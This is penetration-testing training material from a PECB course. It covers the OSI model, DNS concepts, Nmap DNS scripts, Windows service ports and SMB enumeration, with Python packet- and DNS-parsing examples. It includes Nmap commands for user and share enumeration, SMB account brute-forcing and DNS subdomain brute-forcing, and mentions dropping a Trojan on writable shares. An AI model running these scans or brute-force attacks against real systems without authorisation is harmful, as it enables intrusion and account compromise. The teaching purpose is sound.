Course 276 Exercise 2

Schedule for Day 2

Section 8: Technical Foundation Knowledge

© 2015 PECB, Parker Solutions Group, Sysca Consulting


Version 1.2.2
Graeme Parker and Pablo Sisca (Editors)

Documents provided to participants are strictly reserved for training purposes and are copyrighted by Parker
Solutions Group and Sysca Consulting. Unless otherwise specified, no part of this publication may be, without the
written permission of Parker Solutions Group and Sysca Consulting, reproduced or used in any way or format or
by any means whether it be electronic or mechanical including photocopy and microfilm.

Licensed to Synergy Innovation Group (contact@synergy-innov.com)


©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
The Open Systems Interconnection (OSI) model is a reference tool for understanding data communications
between any two networked systems.
It divides the communications process into seven layers. Each layer performs specific functions on behalf of the
layer above it and relies on the services of the layer below it. The three lowest layers focus on passing traffic
through the network to an end system. The top four layers come into play in the end system to complete the
process.
1. The physical layer is responsible for:
Communication with the data link layer above it.
Serialising data link frames into the bits (signals) that are sent on the medium.
Reassembling received bits into frames and handing them to the data link layer.
Transmission to the physical media.
Receiving from the physical media.
Standards:
IEEE 802 physical-layer specifications (e.g. IEEE 802.3 Ethernet signalling)
ISO 2110
ISDN
2. The data link layer is concerned with physical addressing, network topology, physical link management, error
notification, ordered delivery of frames, and flow control. It has two sublayers:
a) Logical Link Control (LLC, IEEE 802.2)
i. Error control and flow control
ii. Manages the link and multiplexes the network-layer protocols that share it
b) Media Access Control (MAC)
i. Communicates with the network adapter and supplies the physical (MAC) address
ii. Controls access to the shared medium (e.g. CSMA/CD on Ethernet)
3. Network Layer
Provides logical addressing and maps logical addresses to physical addresses (e.g. ARP resolves an IP address to
a MAC address).
Responsible for addressing, determining routes for sending data and managing network problems such as packet
switching, congestion and routing.
If a router cannot forward a packet as large as the one the source sent, the network layer compensates by
breaking the data into smaller units (fragmentation). At the receiving end, the network layer reassembles the data.
Protocols:
IP
ARP
RARP
ICMP
RIP
OSPF
IGMP
IPX
NWLink
DDP
DECnet
OSI CLNP
4. The transport layer offers end-to-end communication between devices through a network. Depending on the
application, the transport layer offers either reliable, connection-oriented or connectionless, best-effort
communications.
The two main transport layer protocols are:
1. Transmission Control Protocol (TCP)
2. User Datagram Protocol (UDP)
Functions:
Communicate with the session layer above.
Reassemble transport Protocol Data Units into data streams.
Reliable protocols operating at this layer will:
Detect errors and lost data
Recover lost data
Manage retransmission of data
Segmentation of data streams into transport Protocol Data Units.
Communicate with the network layer below.
Protocols:
TCP
UDP
DCCP
SPX
NWLink
NetBIOS / NetBEUI
ATP
5. The session layer sets up, coordinates, and terminates conversations, exchanges, and dialogues between the
applications at each end.
Functions:
Session establishment, maintenance and termination: allows two application processes on different machines to
establish, use and terminate a connection, called a session.
Session support: performs the functions that allow these processes to communicate over the network, performing
security, name recognition, logging, and so on.
Protocols:
NetBIOS
Named Pipes
Mail Slots
RPC
SAP
L2TP
PPTP
SPDY
6. Presentation Layer
Character code translation: for example, ASCII to EBCDIC.
Data conversion: bit order, CR to CR/LF, integer to floating point, and so on.
Data compression: reduces the number of bits that need to be transmitted on the network.
Data encryption: encrypts data for security purposes, for example password encryption.
7. Application Layer
The OSI model defines the application layer as the layer closest to the end user: it provides the network interface
that user applications use to send and receive data, and it interfaces with the presentation layer below it. (It is not
the user interface itself; the program, e.g. a browser, is what renders data for the user.)
Examples of applications and protocols that use the network at this layer:
Telnet
FTP
Instant messaging software (AIM, MSN, ICQ, Yahoo)
Microsoft Windows file shares (SMB)
Web browsers (Internet Explorer, Firefox, Google Chrome, Safari) using HTTP
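The layering above is easiest to see on the wire. The following is an added example (not part of the original course material): it builds one Ethernet II frame carrying IPv4, TCP and a short HTTP request, then decapsulates it layer by layer, verifying the IPv4 header checksum on the way. The MAC and IP addresses are constructed sample values, not captured traffic.

```python
import socket
import struct

# Constructed sample addresses (illustrative only, not captured traffic).
SRC_MAC = bytes.fromhex("000c29aabbcc")
DST_MAC = bytes.fromhex("0004a70c22d3")
SRC_IP, DST_IP = "192.168.1.10", "67.205.10.57"


def ipv4_checksum(header):
    """RFC 791 header checksum: ones' complement of the ones' complement sum of 16-bit words.
    Computed over a header whose checksum field is already filled in, a valid header yields 0."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_frame(payload, sport=40000, dport=80):
    """Encapsulate an application payload top-down: TCP (layer 4) -> IPv4 (layer 3) -> Ethernet (layer 2)."""
    # TCP header, no options: data offset 5 words, flags PSH|ACK, window 65535, checksum left at 0
    tcp = struct.pack("!HHIIHHHH", sport, dport, 1000, 0, (5 << 12) | 0x18, 65535, 0, 0)
    total_len = 20 + len(tcp) + len(payload)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0x1234, 0x4000, 64, 6, 0,
                     socket.inet_aton(SRC_IP), socket.inet_aton(DST_IP))
    ip = ip[:10] + struct.pack("!H", ipv4_checksum(ip)) + ip[12:]   # fill in the checksum field
    eth = DST_MAC + SRC_MAC + struct.pack("!H", 0x0800)              # EtherType 0x0800 = IPv4
    return eth + ip + tcp + payload


def parse_frame(frame):
    """Decapsulate bottom-up, returning one entry per OSI layer the frame carries."""
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    layers = {"data_link": {"src_mac": src.hex(":"), "dst_mac": dst.hex(":"), "ethertype": ethertype}}
    if ethertype != 0x0800:
        raise ValueError("not IPv4: ethertype 0x%04x" % ethertype)
    ip = frame[14:]
    ver_ihl, _tos, total_len, _ident, _frag, ttl, proto, _csum, s, d = struct.unpack("!BBHHHBBH4s4s", ip[:20])
    ihl = (ver_ihl & 0x0F) * 4
    if ver_ihl >> 4 != 4 or ihl < 20 or total_len > len(ip):
        raise ValueError("malformed IPv4 header")
    if ipv4_checksum(ip[:ihl]) != 0:
        raise ValueError("bad IPv4 header checksum")
    layers["network"] = {"src": socket.inet_ntoa(s), "dst": socket.inet_ntoa(d), "ttl": ttl, "protocol": proto}
    if proto != 6:
        raise ValueError("not TCP: protocol %d" % proto)
    tcp = ip[ihl:total_len]                       # total_len trims any Ethernet padding
    sport, dport, seq, ack, off_flags = struct.unpack("!HHIIH", tcp[:14])
    data_off = (off_flags >> 12) * 4
    layers["transport"] = {"src_port": sport, "dst_port": dport, "seq": seq,
                           "syn": bool(off_flags & 0x02), "ack": bool(off_flags & 0x10),
                           "psh": bool(off_flags & 0x08)}
    layers["application"] = tcp[data_off:]        # whatever the upper layers put on the wire
    return layers


if __name__ == "__main__":
    for layer, value in parse_frame(build_frame(b"GET / HTTP/1.1\r\nHost: www.pecb.org\r\n\r\n")).items():
        print(layer, value)
```

Each header is prepended on the way down and stripped on the way up, which is why a sniffer such as tcpdump or Wireshark can show the same bytes as an Ethernet, IP, TCP and HTTP dissection at once.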

DNS (Domain Name System) services translate names such as www.pecb.org or main.domain.company into IP
addresses so that traffic can be routed to the right server hosting the service.
In other words, DNS is our telephone directory, in which a number can be matched to a friend, business or contact.
Although IP addresses can be remembered (particularly IPv4 addresses), DNS provides a flexible way to maintain a
large number of names and IP addresses across the globe.
DNS works in a hierarchical structure in which queries are passed through different servers until a match and its
associated IP address are found.
Any vulnerability or misconfiguration in these services would allow an attacker (and a professional pen tester) to
redirect normal users to rogue or attacker-controlled servers, ultimately forcing them either to log in with their
credentials or to disclose sensitive information such as credit card details or password recovery information, or
even to exploit client software vulnerabilities and potentially take control of their host.

Terminology – Understanding DNS Basics
Zone
A portion of the DNS namespace, i.e. a set of resource records, managed together by one set of authoritative
servers. Think of this loosely as a 'domain': www.pecb.org, test.pecb.org etc. belong to the pecb.org zone.
Nameserver
Server software answering DNS questions such as 'what's the IP for www.pecb.org?'. It is either authoritative for
the zone or keeps asking other servers (a recursive nameserver) if it doesn't know the answer directly.
Authoritative Nameserver
An authoritative nameserver provides the actual answer to your DNS queries.
It provides original and definitive answers to DNS queries; it does not provide cached answers obtained from
another nameserver. Therefore it only returns answers to queries about domain names that are installed in its
configuration.
There are two types of authoritative nameservers:
Master server (primary nameserver): a master server stores the original master copies of all zone records. A
hostmaster only makes changes to the master server's zone records. Each slave server gets updates via the zone
transfer mechanism of the DNS protocol (AXFR). All slave servers maintain an identical copy of the master
records.
Slave server (secondary nameserver): a slave server is an exact replica of the master server. It is used to share
DNS server load and to improve DNS zone availability in case the master server fails. It is recommended that you
have at least two slave servers and one master server for each domain name.
Because zone transfers are meant for slaves only, an authoritative server that answers AXFR requests from
arbitrary clients hands out the whole zone; this is what the dns-zone-transfer Nmap script described later tests.
$ host -t ns pecb.org
pecb.org name server ns3.dreamhost.com.
pecb.org name server ns1.dreamhost.com.
pecb.org name server ns2.dreamhost.com.
Resolver
This is the client part of the DNS client/server system: it asks the questions about hostnames. The resolver is
usually a small library compiled into each program that requires DNS services, and it knows just enough to send
questions to a nearby nameserver.
On Linux/UNIX systems, the list of servers to ask is found in the file /etc/resolv.conf; on Windows it is part of the
network connection settings in the Control Panel. This usually consists of a list of IP addresses, each of which is
expected to have a nameserver listening on the other end.
Resolvers are usually very small and dumb, relying on the servers to do the heavy lifting.
Recursive Nameserver
This is a nameserver that is willing to go out on the internet and find the results for zones it is not authoritative
for, as a service to its clients. Not all nameservers provide recursive service, and those that do are often limited to
trusted clients (an ISP, say, may provide name service only to its customers). A server that recurses for anyone (an
open resolver) is what the dns-recursion Nmap script described later detects.
Resource Record
Though most think of DNS as providing hostname-to-IP mapping, there are actually other kinds of questions we
can ask of a nameserver, and this highlights the notion that DNS is really a database of "resource records".
The most common type is an IP address (an "A" record), but other records exist too: NS (nameserver), MX (mail
exchanger), SOA (Start of Authority), and so on.
Delegation
When a nameserver doesn't have the contents of a zone, but knows how to find the owner, it is said to delegate
service of that zone to another nameserver. Informally, it is a pass-the-buck mechanism: "I know the zone you're
asking about, go ask (hostname) for the details".
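To make the terminology concrete, the following added example (not part of the original course material) builds a DNS query for www.pecb.org in wire format and parses a constructed authoritative response carrying an A record and the zone's NS records, including the name-compression pointers real servers use. It also shows the minimum check a resolver performs before accepting an answer (transaction ID and question must match), which is the check that predictable transaction IDs and source ports undermine. The response bytes are constructed here; the IP address and nameserver names are the ones shown above and are not the result of a live query.

```python
import os
import struct

# Record types used below (a subset of the DNS type registry).
QTYPE = {1: "A", 2: "NS", 5: "CNAME", 6: "SOA", 15: "MX", 16: "TXT", 28: "AAAA"}


def encode_name(name):
    """Wire-format a hostname: length-prefixed labels terminated by a zero byte."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def build_query(name, qtype=1, txid=None):
    """Standard query with the RD (recursion desired) bit set and a 16-bit transaction ID."""
    if txid is None:                         # a resolver must pick an unpredictable ID
        txid = struct.unpack("!H", os.urandom(2))[0]
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)


def decode_name(msg, offset):
    """Read a possibly compressed name; return (name, offset just past it in the message)."""
    labels, end, jumped, hops = [], None, False, 0
    while True:
        length = msg[offset]
        if length & 0xC0 == 0xC0:            # compression pointer to an earlier name
            if not jumped:
                end = offset + 2
            offset = struct.unpack("!H", msg[offset:offset + 2])[0] & 0x3FFF
            jumped, hops = True, hops + 1
            if hops > 64:
                raise ValueError("compression pointer loop")
            continue
        offset += 1
        if length == 0:
            break
        labels.append(msg[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels) + ".", end if jumped else offset


def parse_rr(msg, offset):
    """Parse one resource record: owner name, type, class, TTL, RDLENGTH, RDATA."""
    name, offset = decode_name(msg, offset)
    rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", msg[offset:offset + 10])
    offset += 10
    rdata = msg[offset:offset + rdlen]
    if rtype == 1 and rdlen == 4:
        value = ".".join(str(b) for b in rdata)
    elif rtype in (2, 5):                    # NS / CNAME: rdata is a (compressible) name
        value, _ = decode_name(msg, offset)
    elif rtype == 15:                        # MX: 16-bit preference followed by a name
        pref = struct.unpack("!H", rdata[:2])[0]
        host, _ = decode_name(msg, offset + 2)
        value = "%d %s" % (pref, host)
    else:
        value = rdata.hex()
    return {"name": name, "type": QTYPE.get(rtype, rtype), "ttl": ttl, "rdata": value}, offset + rdlen


def parse_message(msg):
    """Parse the header, question and the answer/authority/additional sections of a DNS message."""
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    out = {"id": txid, "qr": bool(flags & 0x8000), "aa": bool(flags & 0x0400),
           "rd": bool(flags & 0x0100), "ra": bool(flags & 0x0080), "rcode": flags & 0xF,
           "questions": [], "answers": [], "authority": [], "additional": []}
    offset = 12
    for _ in range(qd):
        name, offset = decode_name(msg, offset)
        qtype, _qclass = struct.unpack("!HH", msg[offset:offset + 4])
        offset += 4
        out["questions"].append((name, QTYPE.get(qtype, qtype)))
    for section, count in (("answers", an), ("authority", ns), ("additional", ar)):
        for _ in range(count):
            rr, offset = parse_rr(msg, offset)
            out[section].append(rr)
    return out


def build_response(query, ip, nameservers):
    """Constructed authoritative answer: echoes the query's ID and question, adds one A record and
    the zone's NS records. 0xC00C points at the question name (offset 12); 0xC010 points at the
    'pecb.org' suffix inside it, which is how servers compress repeated names."""
    header = query[:2] + struct.pack("!HHHHH", 0x8580, 1, 1, len(nameservers), 0)  # QR, AA, RD, RA
    question = query[12:]
    answer = b"\xC0\x0C" + struct.pack("!HHIH", 1, 1, 300, 4) + bytes(int(o) for o in ip.split("."))
    authority = b""
    for ns in nameservers:
        rdata = encode_name(ns)
        authority += b"\xC0\x10" + struct.pack("!HHIH", 2, 1, 3600, len(rdata)) + rdata
    return header + question + answer + authority


def response_matches_query(query, response):
    """What a resolver must check before accepting (and caching) an answer: QR set, same transaction
    ID, same question. A forged reply that fails this is dropped; one that guesses the ID (and the
    UDP source port) is accepted, which is why both must be unpredictable."""
    q, r = parse_message(query), parse_message(response)
    return r["qr"] and q["id"] == r["id"] and q["questions"] == r["questions"]
```

Note the AA bit in the constructed response: an authoritative server sets it, a recursive server answering from cache does not, which is how a client can tell the two kinds of answer apart.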

http://en.wikipedia.org/wiki/Domain_Name_System
http://en.wikipedia.org/wiki/DNS_hijacking
http://www.unixwiz.net/techtips/iguide-kaminsky-dns-vuln.html

Understanding some of the vulnerabilities across DNS from a pen tester's point of view:

DNS enumeration
DNS hijacking
DNS spoofing

Nmap scripts for DNS:

dns-blacklist
Checks target IP addresses against multiple DNS anti-spam and open proxy blacklists and returns a list of
services for which an IP has been flagged. Checks may be limited by service category (eg: SPAM, PROXY) or to
a specific service name.

dns-brute
Attempts to enumerate DNS hostnames by brute force guessing of common subdomains. With the dns-brute.srv
argument, dns-brute will also try to enumerate common DNS SRV records.
dns-cache-snoop
Performs DNS cache snooping against a DNS server.

dns-check-zone
Checks DNS zone configuration against best practices, including RFC 1912. The configuration checks are
divided into categories which each have a number of different tests.

dns-client-subnet-scan
Performs a domain lookup using the edns-client-subnet option which allows clients to specify the subnet that
queries supposedly originate from. The script uses this option to supply a number of geographically distributed
locations in an attempt to enumerate as many different address records as possible. The script also supports
requests using a given subnet.

dns-fuzz
Launches a DNS fuzzing attack against DNS servers.

dns-ip6-arpa-scan
Performs a quick reverse DNS lookup of an IPv6 network using a technique which analyzes DNS server
response codes to dramatically reduce the number of queries needed to enumerate large networks.

dns-nsec-enum
Enumerates DNS names using the DNSSEC NSEC-walking technique.

dns-nsec3-enum
Tries to enumerate domain names from the DNS server that supports DNSSEC NSEC3 records.

dns-nsid
Retrieves information from a DNS nameserver by requesting its nameserver ID (nsid) and asking for its id.server
and version.bind values. This script performs the same queries as the following two dig commands:
dig CH TXT version.bind @target
dig +nsid CH TXT id.server @target

dns-random-srcport
Checks a DNS server for the predictable-port recursion vulnerability. Predictable source ports can make a DNS
server vulnerable to cache poisoning attacks (see CVE-2008-1447).

dns-random-txid
Checks a DNS server for the predictable-TXID DNS recursion vulnerability. Predictable TXID values can make a
DNS server vulnerable to cache poisoning attacks (see CVE-2008-1447).

dns-recursion
Checks if a DNS server allows queries for third-party names. It is expected that recursion will be enabled on your
own internal nameservers.

dns-service-discovery
Attempts to discover target hosts' services using the DNS Service Discovery protocol.

dns-srv-enum
Enumerates various common service (SRV) records for a given domain name. The service records contain the
hostname, port and priority of servers for a given service. The following services are enumerated by the script: -
Active Directory Global Catalog - Exchange Autodiscovery - Kerberos KDC Service - Kerberos Passwd Change
Service - LDAP Servers - SIP Servers - XMPP S2S - XMPP C2S

dns-update
Attempts to perform a dynamic DNS update without authentication.

dns-zeustracker
Checks if the target IP range is part of a Zeus botnet by querying ZTDNS @ abuse.ch. Please review the
following information before you start to scan:

https://zeustracker.abuse.ch/ztdns.php

dns-zone-transfer
Requests a zone transfer (AXFR) from a DNS server.

Basic Network mapping using NMAP

• Nmap ping and SYN scanning
• Network capturing with tcpdump or Wireshark
• DNS enumeration

Duration of activity: 20 minutes

nmap -sSU -p 53 --script dns-nsid <target>

Retrieves information from a DNS nameserver by requesting its nameserver ID (nsid) and asking for its
id.server and version.bind values. This script performs the same queries as the following two dig commands:
dig CH TXT version.bind @target
dig +nsid CH TXT id.server @target
The answer leaks the resolver software and version (dnsmasq 2.68 in the output below), which tells an attacker
exactly which advisories to look up; a hardened server answers version.bind with a fixed string or refuses the query.

Example

$ sudo nmap -sSU -p 53 --script dns-nsid 192.168.1.1

Starting Nmap 6.47 ( http://nmap.org ) at 2014-09-30 00:01 BST


Nmap scan report for 192.168.1.1
Host is up (0.0059s latency).

PORT STATE SERVICE
53/tcp open domain
53/udp open domain
| dns-nsid:
|_ bind.version: dnsmasq-2.68
MAC Address: 00:04:A7:0C:22:D3 (FabiaTech)

Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds

$ nmap --script dns-brute www.pecb.org

Attempts to enumerate DNS hostnames by brute force guessing of common subdomains.

Host script results:


| dns-brute:
| DNS Brute-force hostnames:
| mysql.pecb.org - 67.205.8.96
| www.pecb.org - 67.205.10.57
| mail.pecb.org - 208.97.132.208
| ftp.pecb.org - 67.205.10.57
|_ ssh.pecb.org - 67.205.10.57

Most penetration testing activities follow the same principle regardless of the system, infrastructure, OS,
devices or applications under test.
They all share a common trunk:
a) reconnaissance techniques to gather the detailed information needed to carry out attacks;
b) identifying and enumerating systems using scanning techniques, mapping services and potential vulnerabilities;
c) gaining access to systems by exploiting the vulnerabilities (publicly known vulnerabilities or ones found by
0-day research);
d) further techniques to test privilege escalation risks, proving that an attacker could maintain access once a
system has been compromised; and
e) extending the penetration further to other systems, and so on.
Each of these common blocks brings more information to the pen tester (and usually to the attacker), which
redefines the attack vectors and goals.

In order to understand the ways in which systems, networks and application software can be penetrated and
assessed, we first introduce how modern OS security architecture works and in which ways it either fails or
succeeds in preventing common exploitation.
http://en.wikipedia.org/wiki/Supervisor_mode#SUPERVISOR-MODE
The idea here is to introduce how modern OS security architecture attempts to prevent full control of the OS,
infrastructure device or mobile device by segregating high-privilege operations and resource access (supervisor
mode versus user mode).
The main objective is to understand how local or remote vulnerabilities could open specific attack venues (or
vectors) to a legitimate attacker in order to obtain specific access, ultimately compromising not only the host but
the infrastructure in which it sits, its users and its resources, including private data.

The basic principle of many modern OSes, including the Windows platform, is that hosts or servers have to
provide services to other hosts or users in a connected environment.
These services and applications can usually be used as attack vectors, not only by the professional pen tester
but by real attackers.
Services and applications can contain vulnerabilities or be misconfigured, allowing attackers to enumerate
services and users, gather passwords or access network shares.
Out-of-date software can allow attackers to exploit vulnerabilities either remotely or locally, ultimately
compromising the OS, the host and potentially the entire infrastructure.
Unpatched client applications, or undisclosed vulnerabilities (also known as zero-day vulnerabilities), would allow
arbitrary code execution, usually restricted to the user's security context, but that is enough of a foothold for a
successful penetration test to demonstrate the risk to such a system.

http://support.microsoft.com/kb/832017

The Net Logon system service maintains a security channel between your computer and the domain controller to
authenticate users and services. It passes the user's credentials to a domain controller and returns the domain
security identifiers and the user rights for the user. This is typically known as pass-through authentication. Net
Logon is configured to start automatically only when a member computer or domain controller is joined to a
domain. In the Windows 2000 Server and Windows Server 2003 families, Net Logon publishes service resource
locator records in the DNS. When this service runs, it relies on the WORKSTATION service and on the Local
Security Authority service to listen for incoming requests. On domain member computers, Net Logon uses RPC
over named pipes. On domain controllers, it uses RPC over named pipes, RPC over TCP/IP, mail slots, and
Lightweight Directory Access Protocol (LDAP).

System service name: Netlogon


Application protocol        Protocol  Ports
NetBIOS Datagram Service    UDP       138 ³
NetBIOS Name Resolution     UDP       137 ³
NetBIOS Session Service     TCP       139 ³
SMB                         TCP       445
LDAP                        UDP       389
RPC                         TCP       135, plus a random port between 1024 and 65535
                                      135, plus a random port between 49152 and 65535 ²

² This is the range in Windows Server 2012, Windows 8, Windows Server 2008 R2, Windows 7, Windows Server
2008, and Windows Vista.
³ The NetBIOS ports are optional. Netlogon uses these only for trusts that don't support DNS or when DNS fails
during an attempted fallback. If there is no WINS infrastructure and broadcasts can't work, you should either
disable NetBT or set the computers and servers to NodeType=2.

Note The Net Logon service uses RPC over named pipes for earlier versions of Windows clients. This service
has the same firewall requirements as the "File and Printer Sharing" feature.

Server Services
The Server system service provides RPC support and file sharing, print sharing, and named pipe sharing over
the network. The Server service lets users share local resources, such as disks and printers, so that other users
on the network can access them. It also enables named pipe communication between programs that are running
on the local computer and on other computers. Named pipe communication is memory that is reserved for the
output of one process to be used as input for another process. The input-accepting process does not have to be
local to the computer.

Note If a computer name resolves to multiple IP addresses by using WINS, or if WINS failed and the name is
resolved by using DNS, NetBIOS over TCP/IP (NetBT) tries to ping the IP address or addresses of the file server.
Port 139 communications depend on Internet Control Message Protocol (ICMP) echo messages. If IP version 6
(IPv6) is not installed, port 445 communications will also depend on ICMP for name resolution. Preloaded
Lmhosts entries will bypass the DNS resolver. If IPv6 is installed on computers that are running Windows Server
2003 or Windows XP operating systems, port 445 communications do not trigger ICMP requests.

The NetBIOS ports that are listed here are optional. Windows 2000 and newer clients can work over port 445.

System service name: lanmanserver


Application protocol        Protocol  Ports
NetBIOS Datagram Service    UDP       138
NetBIOS Name Resolution     UDP       137
NetBIOS Session Service     TCP       139
SMB                         TCP       445

Terminal Services

Terminal Services provides a multi-session environment that enables client devices to access a virtual Windows
desktop session and Windows-based programs that are running on the server. Terminal Services enables
multiple users to be connected interactively to a computer.

System service name: TermService


Application protocol        Protocol  Ports
Terminal Services           TCP       3389

World Wide Web Publishing Service

World Wide Web Publishing Service provides the infrastructure that you must have to register, manage, monitor,
and serve websites and programs that are registered with IIS. This system service contains a process manager
and a configuration manager. The process manager controls the processes where custom applications and
websites reside. The configuration manager reads the stored system configuration for World Wide Web
Publishing Service and makes sure that Http.sys is configured to route HTTP requests to the appropriate
application pools or operating system processes. You can use the Internet Information Services (IIS) Manager
snap-in to configure the ports that are used by this service. If the administrative website is enabled, a virtual
website is created that uses HTTP traffic on TCP port 8098.

System service name: W3SVC


Application protocol        Protocol  Ports
HTTP                        TCP       80
HTTPS                       TCP       443

Active Directory (Local Security Authority)

Active Directory runs under the Lsass.exe process and includes the authentication and replication engines for
Windows domain controllers. Domain controllers, client computers and application servers require network
connectivity to Active Directory over specific hard-coded ports. Additionally, unless a tunneling protocol is used to
encapsulate traffic to Active Directory, a range of ephemeral TCP ports between 1024 to 5000 and 49152 to
65535 are required.

Application protocol                          Protocol  Ports
Active Directory Web Services (ADWS)          TCP       9389
Active Directory Management Gateway Service   TCP       9389
Global Catalog                                TCP       3269
Global Catalog                                TCP       3268
LDAP Server                                   TCP       389
LDAP Server                                   UDP       389
LDAP SSL                                      TCP       636
IPsec ISAKMP                                  UDP       500
NAT-T                                         UDP       4500
RPC                                           TCP       135
RPC randomly allocated high TCP ports         TCP       1024 - 5000
                                                        49152 - 65535 ¹
SMB                                           TCP       445

¹ This is the range in Windows Server 2012, Windows 8, Windows Server 2008 R2, Windows 7, Windows Server
2008, and Windows Vista.

SNMP Service

SNMP Service lets the local computer service incoming Simple Network Management Protocol (SNMP)
requests. SNMP Service includes agents that monitor activity in network devices and report to the network
console workstation. SNMP Service provides a method of managing network hosts (such as workstation or
server computers, routers, bridges, and hubs) from a centrally-located computer that is running network
management software. SNMP performs management services by using a distributed architecture of
management systems and agents.

System service name: SNMP


Application protocol        Protocol  Ports
SNMP                        UDP       161

Remote Procedure Call (RPC)

The Remote Procedure Call (RPC) system service is an interprocess communication (IPC) mechanism that
enables data exchange and invocation of functionality that is located in a different process. The different process
can be on the same computer, on the LAN, or in a remote location, and it can be accessed over a WAN
connection or over a VPN connection. The RPC service serves as the RPC Endpoint Mapper and Component
Object Model (COM) Service Control Manager. Many services depend on the RPC service to start successfully.

System service name: RpcSs


Application protocol        Protocol  Ports
RPC                         TCP       135
RPC over HTTPS              TCP       593
NetBIOS Datagram Service    UDP       138
NetBIOS Name Resolution     UDP       137
NetBIOS Session Service     TCP       139
SMB                         TCP       445

Notes

RPC does not use only the hard-coded ports listed in the table. Active Directory and other components also
communicate over RPC on dynamically assigned ports in the ephemeral port range. Which ephemeral range
applies depends on the operating system of the server the client connects to (1024-5000 on older versions,
49152-65535 on Windows Vista / Server 2008 and later), so firewall rules written for port 135 alone do not cover
RPC traffic.
The RPC Endpoint Mapper also offers its services by using named pipes. This service has the same firewall
requirements as the "File and Printer Sharing" feature.

Common Pen Testing areas around Windows Services

Net Logon Services
System service name: Netlogon

Application protocol        Protocol  Ports
NetBIOS Datagram Service    UDP       138
NetBIOS Name Resolution     UDP       137
NetBIOS Session Service     TCP       139
SMB                         TCP       445
LDAP                        UDP       389
RPC                         TCP       135, plus a random port between 1024 and 65535
                                      135, plus a random port between 49152 and 65535

Server Services
System service name: lanmanserver

Application protocol        Protocol  Ports
NetBIOS Datagram Service    UDP       138
NetBIOS Name Resolution     UDP       137
NetBIOS Session Service     TCP       139
SMB                         TCP       445

Terminal Services
System service name: TermService

Application protocol        Protocol  Ports
Terminal Services           TCP       3389

World Wide Web Publishing Service
System service name: W3SVC

Application protocol        Protocol  Ports
HTTP                        TCP       80
HTTPS                       TCP       443

Active Directory (Local Security Authority)

Application protocol                          Protocol  Ports
Active Directory Web Services (ADWS)          TCP       9389
Active Directory Management Gateway Service   TCP       9389
Global Catalog                                TCP       3269
Global Catalog                                TCP       3268
LDAP Server                                   TCP       389
LDAP Server                                   UDP       389
LDAP SSL                                      TCP       636
IPsec ISAKMP                                  UDP       500
NAT-T                                         UDP       4500
RPC                                           TCP       135
RPC randomly allocated high TCP ports         TCP       1024 - 5000
                                                        49152 - 65535 ¹
SMB                                           TCP       445

¹ This is the range in Windows Server 2012, Windows 8, Windows Server 2008 R2, Windows 7, Windows Server
2008, and Windows Vista.

SNMP Service
System service name: SNMP

Application protocol        Protocol  Ports
SNMP                        UDP       161

Remote Procedure Call (RPC)
System service name: RpcSs

Application protocol        Protocol  Ports
RPC                         TCP       135
RPC over HTTPS              TCP       593
NetBIOS Datagram Service    UDP       138
NetBIOS Name Resolution     UDP       137
NetBIOS Session Service     TCP       139
SMB                         TCP       445

The RPC Endpoint Mapper also offers its services by using named pipes. This service has the same firewall
requirements as the "File and Printer Sharing" feature.

Basic Port mapping against a full Active Directory (Domain Controller) Windows Server & Windows 8 host
Basic Nmap / SMB NSE Scripts
nmap -sS <host> -vv
Enumeration of Users
nmap --script smb-enum-users.nse -p445 <host>
sudo nmap -sU -sS --script smb-enum-users.nse -p U:137,T:139 <host>
Enumeration of Shares
nmap --script smb-enum-shares.nse -p445 <host>
sudo nmap -sU -sS --script smb-enum-shares.nse -p U:137,T:139 <host>
Brute forcing accounts
nmap --script smb-brute.nse -p445 <host>
sudo nmap -sU -sS --script smb-brute.nse -p U:137,T:139 <host>
Basic Vulnerability checking
nmap --script smb-check-vulns.nse -p445 <host>
sudo nmap -sU -sS --script smb-check-vulns.nse -p U:137,T:139 <host>
Sessions Enumerations
nmap --script smb-enum-sessions.nse -p445 <host>
sudo nmap -sU -sS --script smb-enum-sessions.nse -p U:137,T:139 <host>

(Requires any access higher than anonymous; guests, users, or administrators are all able to perform this
request on Windows 2000, XP, 2003, and Vista.)
Shares Enumerations:
Finding open shares is useful to a penetration tester because there may be private files shared or, if a share is
writable, it could be a good place to drop a Trojan or to infect a file that is already there. Knowing where the share
is could make those kinds of tests more useful, except that determining where the share is requires administrative
privileges already.
Running NetShareEnumAll will work anonymously against Windows 2000, and requires a user-level account on
any other Windows version. Calling NetShareGetInfo requires an administrator account on all versions of
Windows up to 2003, as well as Windows Vista and Windows 7, if UAC is turned down.
Even if NetShareEnumAll is restricted, attempting to connect to a share will always reveal its existence. So, if
NetShareEnumAll fails, a pre-generated list of shares, based on a large test network, is used. Any of those that
succeed are recorded.
Enumeration of Users
From a pen-tester's perspective, retrieving the list of users on any given server creates endless possibilities.
Users are enumerated in two different ways (SAMR enumeration or LSA bruteforcing) by this script, and in
most permissive pen-testing engagements the default configuration (which uses both) will suffice.
Full information regarding these two enumeration techniques can be found here:
http://nmap.org/nsedoc/scripts/smb-enum-users.html
Credit for pioneering some of the techniques used by this script goes to the enum.exe, sid2user.exe and
user2sid.exe programs, which illustrated SID/RID walking techniques and gave insight into how Microsoft
Windows handled null sessions in the past, allowing anonymous users to call functions such as
QueryDisplayInfo, which returns a detailed list of users along with descriptions, types and full names.
This type of enumeration was also used to determine whether users have recently changed their passwords (or
the date of the last update), whether their accounts are locked, or even whether they have never logged in to the
system.
This is useful information for a pen tester (and for attackers) to target certain accounts with password guessing or
password brute-forcing attacks.
Duration of activity: 20 minutes
Further Reading
http://www.sans.org/reading-room/whitepapers/testing/scanning-windows-deeper-nmap-scanning-engine-33138
------
LDAP Enumeration using NMAP Scripts
LDAP Brute Force
